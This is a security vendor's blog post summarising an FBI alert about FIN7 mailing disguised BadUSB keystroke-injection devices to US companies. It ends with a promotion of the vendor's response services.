FIN7 Uses BadUSB Devices to Target U.S. Businesses

The United States Federal Bureau of Investigation (FBI) reported that the infamous FIN7 cybercrime group, behind the Darkside and BlackMatter ransomware operations, is sending malicious BadUSB devices to US companies hoping to infect their systems with malware and set the stage for future cyberattacks. Several packages containing LilyGo-branded BadUSB devices were sent using the United States Postal Service (USPS) and United Parcel Service (UPS) to several US businesses in the transportation, insurance, and defense industries. One set of packages imitating the US Department of Health and Human Services (HHS) contains letters referencing COVID-19 guidelines with a poisoned USB inside. Another set of packages imitating Amazon comes disguised as a decorative gift box containing a fake thank you letter, counterfeit gift card, and a USB device.

FIN7 Target Companies Using BadUSB Devices

According to the FBI, if people who received the packages plug the BadUSB devices into their computers, the BadUSB attack is executed. The BadUSB devices registers itself as a keyboard and sends a series of pre-configured automated keystrokes to the user’s PC. The keystrokes run PowerShell commands to download and install various malware strains acting as backdoors into the victim’s networks for threat operators. According to the investigation, the ransomware operators can obtain administrative access and move laterally to other local systems.

The FIN7 threat actors utilize various tools, including Metasploit, Cobalt Strike, PowerShell scripts, Carbanak, GRIFFON, DICELOADER, and TIRION to deploy ransomware, including BlackMatter and REvil, on compromised networks.

In November 2021, the FIN7 group used the Amazon thank-you letter trick to target a United States defense industry company. The group also sent the malicious BadUSB devices to a United States hospitality provider after a security firm discovered the device in March 2020. The FBI included images of the Amazon thank-you letter, the HHS COVID-19 alert, and the LilyGO-branded BadUSB device in their alert.

The recent attacks demonstrate the innovation of cybercriminals and their desperation to target victims in critical industries. It’s crucial for companies of every size to remain alert to the current threat landscape and take necessary measures to improve network security infrastructure. At SpearTip, our certified engineers at our Security Operations Centers work in a continuous investigative cycle and are ready to respond to incidents, like those perpetrated by FIN7, at a moment’s notice. Our ShadowSpear Platform is an unparalleled resource with endpoint detection and response capabilities preventing ransomware attacks from impacting companies. ShadowSpear optimizes visibility to identify threats, neutralize malware, and counter adversaries in real-time.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.